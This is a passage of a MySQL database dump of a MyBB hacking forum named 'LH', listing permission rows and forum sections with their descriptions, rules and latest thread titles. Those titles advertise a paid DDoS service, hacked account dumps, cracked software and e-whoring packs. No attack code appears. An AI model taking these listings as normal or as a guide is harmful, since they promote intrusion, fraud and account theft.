mybb_forumpermissions VALUES('648', '5', '20', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('649', '2', '20', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('650', '19', '20', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('651', '28', '20', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('652', '29', '20', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('653', '39', '20', '1', '1', '0', '0', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('850', '30', '20', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('655', '31', '20', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('656', '44', '20', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('657', '45', '20', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('694', '48', '20', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('993', '50', '20', '0', '1', '1', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('660', '54', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('661', '60', '20', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0'); INSERT INTO mybb_forumpermissions VALUES('662', '61', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('663', '62', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('823', '64', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('665', '66', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('666', '78', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('667', '79', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('668', '80', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('764', '5', '21', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('765', '2', '21', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('766', '19', '21', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('767', '28', '21', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('768', '29', '21', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('769', '39', '21', '1', '1', '0', '0', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('851', '30', '21', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('771', '31', '21', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('772', '44', '21', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('773', '45', '21', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('774', '48', '21', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('994', '50', '21', '0', '1', '1', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('776', '54', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('777', '60', '21', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0'); INSERT INTO mybb_forumpermissions VALUES('778', '61', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('779', '62', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('780', '66', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('781', '78', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('782', '79', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('783', '80', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('784', '81', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('788', '82', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('789', '82', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('793', '82', '9', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('790', '82', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('791', '82', '6', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('792', '82', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('794', '82', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('795', '82', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('796', '82', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('797', '82', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('798', '82', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('799', '82', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('809', '10', '10', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('810', '83', '10', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('812', '34', '10', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('813', '51', '10', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('814', '75', '10', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('831', '84', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('832', '84', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('833', '84', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('834', '84', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('835', '84', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('836', '84', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('837', '84', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('838', '84', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('839', '84', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('840', '84', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('841', '84', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); DROP TABLE IF EXISTS mybb_forums; CREATE TABLE mybb_forums ( fid smallint(5) unsigned NOT NULL auto_increment, name varchar(120) NOT NULL, description text NOT NULL, linkto varchar(180) NOT NULL, type char(1) NOT NULL, pid smallint(5) unsigned NOT NULL, parentlist text NOT NULL, disporder smallint(5) unsigned NOT NULL, active int(1) NOT NULL, open int(1) NOT NULL, threads int(10) unsigned NOT NULL, posts int(10) unsigned NOT NULL, lastpost int(10) unsigned NOT NULL, lastposter varchar(120) NOT NULL, lastposteruid int(10) unsigned NOT NULL, lastposttid int(10) NOT NULL, lastpostsubject varchar(120) NOT NULL, allowhtml int(1) NOT NULL, allowmycode int(1) NOT NULL, allowsmilies int(1) NOT NULL, allowimgcode int(1) NOT NULL, allowvideocode int(1) NOT NULL, allowpicons int(1) NOT NULL, allowtratings int(1) NOT NULL, status int(4) DEFAULT '1' NOT NULL, usepostcounts int(1) NOT NULL, password varchar(50) NOT NULL, showinjump int(1) NOT NULL, modposts int(1) NOT NULL, modthreads int(1) NOT NULL, mod_edit_posts int(1) NOT NULL, modattachments int(1) NOT NULL, style smallint(5) unsigned NOT NULL, overridestyle int(1) NOT NULL, rulestype smallint(1) NOT NULL, rulestitle varchar(200) NOT NULL, rules text NOT NULL, unapprovedthreads int(10) unsigned NOT NULL, unapprovedposts int(10) unsigned NOT NULL, defaultdatecut smallint(4) unsigned NOT NULL, defaultsortby varchar(10) NOT NULL, defaultsortorder varchar(4) NOT NULL, ficon varchar(120) DEFAULT 'shim.gif' NOT NULL, ForumsRequirements int(4) NOT NULL, PRIMARY KEY (fid) ); INSERT INTO mybb_forums VALUES('1', 'General', '', '', 'c', '0', '1', '1', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO mybb_forums VALUES('2', 'Test', 'For staff to test new features. ', '', 'f', '5', '1,5,2', '1', '1', '1', '12', '34', '1350874777', 'NXK', '61', '1044', 'dkdadwa', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1339992224_tests.png', '0'); INSERT INTO mybb_forums VALUES('3', 'Announcements, Feedback, Bugs and Suggestions', 'This is the section where LH staff announce new rules, people can suggest new ideas, report bugs & issues and leave your feedback here.', '', 'f', '1', '1,3', '1', '1', '1', '79', '719', '1352662590', 't3h jok3r', '1', '1236', 'CloudFlare Issues?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Rules for this section', '1. Only Announcements by Mods and Staff are posted here, member announcements go in the Off Topic section.\r\n2. You are allowed to post your feedbacks and report site bugs here.\r\n3. We have a separate section for member and staff reports and suggestions.', '0', '0', '0', '', '', '1339992119_announcements.png', '0'); INSERT INTO mybb_forums VALUES('4', 'Introduction', 'New to LH? Introduce yourself to other members and get to know others. ', '', 'f', '1', '1,4', '2', '1', '1', '47', '345', '1352662960', 't3h jok3r', '1', '1255', 'Wasssup?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1339992017_Positive.png', '0'); INSERT INTO mybb_forums VALUES('5', 'Staff', 'Private forum for all staff discussions.', '', 'f', '1', '1,5', '3', '1', '1', '10', '47', '1352195911', 't3h jok3r', '1', '1173', 'Request for LH staff', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1339992183_client.png', '0'); INSERT INTO mybb_forums VALUES('6', 'Miscellaneous ', '', '', 'c', '0', '6', '2', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '1', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO mybb_forums VALUES('7', 'Off Topic', 'All discussions non-relating hacking are allowed in this section. Trolling will not be tolerated.', '', 'f', '6', '6,7', '1', '1', '1', '102', '935', '1352663068', 'sirchamp', '53', '1253', 'Who\'s had a Toothache?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '2', 'Rules', '1. No trolling\r\n2. No donation begging\r\n3. This is not 4chan', '0', '0', '0', '', '', '1339992294_sofa.png', '0'); INSERT INTO mybb_forums VALUES('8', 'Music', 'Fan of Music? Discuss and post your favorite songs here. ', '', 'f', '6', '6,8', '6', '1', '1', '20', '135', '1351698117', 'Mac Miller', '302', '1140', 'Who likes OFWGKTA?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1339992375_juk.png', '0'); INSERT INTO mybb_forums VALUES('9', 'Monetizing Techniques ', 'If you\'re looking for methods to make more money online this is your forum.', '', 'f', '6', '6,9', '5', '1', '1', '38', '222', '1352665871', 'VirtualLegend', '228', '1118', '? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1339992422_emblem-money.png', '0'); INSERT INTO mybb_forums VALUES('10', 'Blackhat', '', '', 'c', '0', '10', '3', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO mybb_forums VALUES('11', 'Help Desk', 'New to hacking? Need help? Post all your questions here. Read forum rules', '', 'f', '10', '10,11', '1', '1', '1', '13', '77', '1352625357', 'sirchamp', '53', '1144', 'What can you do with?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '2', 'Rules', '1. This forum is for help only, not for tutorials. \r\n2. Please be patient, you can not expect a reply as soon as you post your question.', '0', '0', '0', '', '', '1339992459_Help_Circle_Blue.png', '0'); INSERT INTO mybb_forums VALUES('12', 'Tutorials', 'This forum is for all hacking and setup tutorials and guides. Please share your tutorials here. ', '', 'f', '10', '10,12', '2', '1', '1', '43', '176', '1352526732', 'PiXEL^OG', '258', '1220', 'Big list Hacking tutorials with .txt', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1339992570_graduated.png', '0'); INSERT INTO mybb_forums VALUES('13', 'Website and Forum Hacking', 'SQL Injection is a common website and forum hacking technique used by many website hackers. Learn how to SQL Inject here. ', '', 'f', '10', '10,13', '3', '1', '1', '26', '90', '1352571980', 'Triple H', '4', '1222', '400,000 Hacked Yahoo Accounts Dumps', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1339992990_domain-names-px-png.png', '0'); INSERT INTO mybb_forums VALUES('14', 'Anonymity ', 'Discussions on staying Anonymous including Proxies and Virtual Private Networks (VPNs)', '', 'f', '10', '10,14', '4', '1', '1', '14', '55', '1352572115', 'Triple H', '4', '991', 'VPN Accounts With Guide :)', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'modem.png', '0'); INSERT INTO mybb_forums VALUES('15', 'Tools and Programs', 'Share your favorite blackhat tools and programs here. Read the forum rules. ', '', 'f', '10', '10,15', '6', '1', '1', '37', '187', '1352534038', 't3h jok3r', '1', '1209', 'WinRAR cracked', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '2', 'Rules', '1. Use the search button to see if the program is already posted or not. Updated versions are allowed.\r\n2. Do not request programs here.\r\n3. All programs must contain a virus scan, do NOT upload on virustotal.', '0', '0', '0', '', '', '1339992636_preferences-system-network.png', '5'); INSERT INTO mybb_forums VALUES('16', 'Social Engineering and Human Manipulation', 'Social Engineering is the art of manipulating people into performing actions or divulging confidential information.', '', 'f', '10', '10,16', '9', '1', '1', '48', '217', '1352597515', 'iTzIpod', '82', '418', '[eBook][Special] iTzIpod\'s SEing Tutorial', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'guy_fawkes_mask.png', '0'); INSERT INTO mybb_forums VALUES('17', 'E-Whoring', 'Don\'t know what E-Whoring is? Find out here. **Caution: Adult content warning!', '', 'f', '16', '10,16,17', '1', '1', '1', '11', '41', '1352476992', 'moruzaks', '323', '1218', 'Camdecoy bitch available here', '0', '1', '1', '0', '0', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Rules', '1. All packs should have at least 2 picture previews.\r\n2. All previews must be censored.\r\n3. No previews directing to other sites.\r\n4. Img & video code has been disabled for this forum.', '0', '0', '0', '', '', 'n4d9577fda0944_small.jpg', '0'); INSERT INTO mybb_forums VALUES('18', 'AIM MSN IRC ICQ and IM Hacks', 'If you are into exploiting instant messaging systems then we have a perfect forum for you. Post here for AIM hacks and other IM exploits.', '', 'f', '10', '10,18', '10', '1', '1', '12', '41', '1352526819', 'p420', '9', '1211', 'Facebook Blaster Pro v10.0', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1339993091_aim.png', '0'); INSERT INTO mybb_forums VALUES('19', 'Junk', 'A section for all unwanted threads.', '', 'f', '1', '1,19', '5', '1', '1', '80', '330', '1352249456', 't3h jok3r', '1', '1120', '[Junk]HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'trash_full.png', '0'); INSERT INTO mybb_forums VALUES('20', 'File Protection, Crypters, Cryptography etc ', 'For discussion on keys, ciphers, and algorithms often used to keep information secret. Encryption is the art of concealing data and code.', '', 'f', '10', '10,20', '7', '1', '1', '11', '44', '1352521603', 'Timmy', '5', '766', '[3/14] War - Crypter [ScanTime] by cris', '0', '1', '1', '1', '1', '1', '1', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'application-pgp-encrypted.png', '0'); INSERT INTO mybb_forums VALUES('21', 'Botnets and IRC Bots, Zombies', 'Botnets, IRC Bots, Zombies and DDoS discussion', '', 'f', '10', '10,21', '8', '1', '1', '16', '92', '1352518368', 'Triple H', '4', '398', '[Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'intranet.png', '0'); INSERT INTO mybb_forums VALUES('22', 'Whitehat', '', '', 'c', '0', '22', '5', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO mybb_forums VALUES('23', 'White Hat Help', 'Need to secure your website? Have you infected yourself? This is the right section ', '', 'f', '22', '22,23', '1', '1', '1', '12', '50', '1351112848', 'R?????zo?', '62', '532', 'Think you have an infection? Click Here.', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'borsalino_blanc.png', '0'); INSERT INTO mybb_forums VALUES('24', 'Miscellaneous Computer Talk', 'Off topic computer discussions are to be held here. ', '', 'f', '22', '22,24', '2', '1', '1', '23', '99', '1351828953', 'mothered', '205', '1105', 'Windows 8 Officially released 26-10', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'preferences-system-login.png', '0'); INSERT INTO mybb_forums VALUES('25', 'Computer Protection and Security Breaches', 'Find out the latest security alerts and post your topics here related to computer protection. ', '', 'f', '22', '22,25', '3', '1', '1', '12', '45', '1352527686', 'spacefish36', '8', '1225', '[Serials] Malwarebytes Full keys Dump', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'kwikdisk.png', '0'); INSERT INTO mybb_forums VALUES('26', 'LH Elite ', '', '', 'c', '0', '26', '6', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO mybb_forums VALUES('27', 'Sign up for Elite', 'Sign up for Elite Membership here and find out the benefits on upgrading to elite here. ', 'http://l33thacking.com/upgrade.php', 'f', '26', '26,27', '1', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'user_male_add (1).png', '0'); INSERT INTO mybb_forums VALUES('28', 'Elite Discussion Area', 'For Elite discussions and brags on your new hacks, gifts etc.', '', 'f', '31', '31,28', '1', '1', '1', '5', '59', '1352550776', 'iTzIpod', '82', '1245', 'New Section Added in VIP tab', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'skull.png', '0'); INSERT INTO mybb_forums VALUES('29', 'Advanced Methods', 'Get the exclusive advanced grey hat methods here. This section is for advanced tutorials, guides and ebooks. ', '', 'f', '31', '31,29', '2', '1', '1', '23', '105', '1352321629', 'VirtualLegend', '228', '1217', 'Win all paypal disputes!', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Rules for this forum', '1. Do not post programs, this is for tutorials, guides and ebooks.\r\n2. Do not post content that is already out in the public area on LH', '0', '0', '0', '', '', 'atom.png', '0'); INSERT INTO mybb_forums VALUES('30', 'Premium Downloads', 'Have a program that you would like to share with premium members only or want to distribute a program here which you don\'t want normal members to have? Post them here. ', '', 'f', '31', '31,30', '4', '1', '1', '27', '109', '1352551193', 'iTzIpod', '82', '426', '[100% Virus Free] Photoshop CS5', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Forum rules', '1. All downloads must contain a virus scan.\r\n2. Program must not already be distributed in public forums on LH.\r\n3. Download at your own risk!\r\n4. This section is only for programs.', '0', '0', '0', '', '', 'program_file1_4.png', '0'); INSERT INTO mybb_forums VALUES('31', 'Upgraded', '', '', 'c', '0', '31', '7', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO mybb_forums VALUES('32', 'GFX Corner', '', '', 'c', '0', '32', '10', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO mybb_forums VALUES('33', 'Graphics Help Desk', 'Need Help in creating an image? Stuck at a tutorial? Post your questions related graphics editing here. ', '', 'f', '32', '32,33', '1', '1', '1', '6', '49', '1352598257', 'iTzIpod', '82', '1171', 'Anyone have photoshop cracked?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'premium_support.png', '0'); INSERT INTO mybb_forums VALUES('34', 'Tutorials and Guides', 'Post your tutorials and guides on how to use Photoshop, GIMP and other programs. ', '', 'f', '32', '32,34', '2', '1', '1', '34', '138', '1352594009', 'XxTREYZxX', '257', '1213', 'Black Sleek Thread Design .PSD', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'paint.png', '0'); INSERT INTO mybb_forums VALUES('35', 'Graphics Lounge ', 'Show off with your creations, Create contests, ask off topic graphics related questions here (No support here). ', '', 'f', '32', '32,35', '5', '1', '1', '32', '216', '1352597485', 'iTzIpod', '82', '1249', 'New Avatar', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'Deviant_Art.png', '0'); INSERT INTO mybb_forums VALUES('36', 'Marketplace', '', '', 'c', '0', '36', '11', '0', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO mybb_forums VALUES('37', 'Marketplace Discussions', 'Looking for something to buy? Need to work out a price? Want to report a scammer? This is the right section for you.', '', 'f', '36', '36,37', '1', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'forum_32.png', '0'); INSERT INTO mybb_forums VALUES('38', 'Scam Reports', 'Want to report a scammer? All scammer reports are to be made here. ', '', 'f', '37', '36,37,38', '1', '1', '1', '1', '1', '1344965610', 't3h jok3r', '1', '106', 'Filling a scam report', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'alert.png', '0'); INSERT INTO mybb_forums VALUES('39', 'Premium Sellers', 'Only upgraded members can make threads here. ', '', 'f', '36', '36,39', '2', '1', '1', '1', '8', '1346458283', 'iTzIpod', '82', '195', '[Selling] Cheap Netflix Accounts', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'kim_yongii256.png', '0'); INSERT INTO mybb_forums VALUES('40', 'Secondary Sellers', 'All members can make threads here. Please be extra careful with all deals in this section. ', '', 'f', '36', '36,40', '3', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'emblem_handshake.png', '0'); INSERT INTO mybb_forums VALUES('41', 'Auctions', 'This forum is for auctions. Please follow the forum guidelines. ', '', 'f', '36', '36,41', '4', '1', '1', '2', '3', '1346300993', 'Thunder™', '84', '287', 'steam account', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'auction_hammer_gavel.png', '0'); INSERT INTO mybb_forums VALUES('42', 'News and Happening', 'Find out the latest buzz around the around here. ', '', 'f', '6', '6,42', '2', '1', '1', '32', '197', '1352619728', 'RAND0M1ZER', '262', '1235', 'Marijuana legalized in two US states', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', 